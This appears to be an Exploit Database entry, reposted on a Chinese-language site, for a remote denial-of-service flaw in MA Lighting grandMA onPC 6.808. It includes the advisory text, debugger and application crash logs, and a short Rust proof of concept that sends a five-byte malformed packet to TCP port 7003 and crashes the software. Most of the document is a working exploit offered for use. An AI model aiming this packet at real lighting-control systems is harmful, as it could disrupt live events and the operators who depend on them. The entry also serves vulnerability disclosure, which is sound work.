MA Lighting Technology grandMA onPC 6.808 – Remote Denial of Service

• Exploit Database
• 21 阅读

• 作者： LiquidWorm
  日期： 2014-04-05
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32704/

• /*
  
  MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit
  
  
  Vendor: MA Lighting Technology GmbH
  Product web page: http://www.malighting.com
  Affected version: grandMA series 1 onPC Software 6.808 (6.801)
  
  Summary: The grandMA onPC software incorporates all functions of a grandMA
  console and offers you its full potential on your notebook or PC. You can
  use grandMA onPC for running, programming or offline pre-programming, as
  well as a smart backup solution within the grandMA system. With the MA onPC
  command wing and MA onPC fader wing MA Lighting has developed a sophisticated
  hardware extension perfectly suited for the grandMA onPC software.
  
  Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
  issue when processing socket connection negotiation. This issue occurs when
  the application handles a single malformed packet over TCP port 7003, resulting
  in a crash.
  
  ===========================================================================
  
  (1324.be4): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
  eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0 nv up ei pl nz ac pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010216
  ntdll!RtlEnterCriticalSection+0x12:
  77ce22c2 f00fba3000lock btr dword ptr [eax],0 ds:002b:3535393f=????????
  
  --
  
  303.640 GMA : RR NEWSTATION IN NETWORK 127.0.0.1(100) AS Standalone
  367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
  367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
  367.180 CC: ******* EXCEPTION **************************
  367.180 CC: * ACCESS_VIOLATION
  367.180 CC: * EAX = 37363341EBX =6D856B0
  367.180 CC: * ECX = 37363339EDX =B78F41C
  367.180 CC: * ESI = 37363341EDI = 3736333D
  367.180 CC: * DESKTYP : GMA [Windows]
  367.180 CC: * VERSION : 6.808 STREAMING : 6801
  367.180 CC: ********************************************
  367.240 CC: 0x775522c2 RtlEnterCriticalSection() + 0x12
  
  ===========================================================================
  
  
  Tested on: Microsoft Windows 7 Professional SP1 (EN)
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5183
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php
  
  
  31.03.2014
  
  */
  
  
  use std::io::net::ip::SocketAddr;
  use std::io::net::tcp::TcpStream;
  
  fn bann() {
  	println!("
  	+======================================+
  	| grandMA onPC 6.808 Denial of Service |
  	|--------------------------------------|
  	||
  	| ID: ZSL-2014-5183|
  	+======================================+
  	");
  }
  
  fn main() {
  	bann();
  	println!("\n[*] Sending packet to local host on tcp port 7003\n");
  	let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
  	let mut socket = TcpStream::connect(addr).unwrap();
  	socket.write(bytes!("\x74\x30\x30\x74\x21"));
  	println!("[*] Crashed!\n");
  }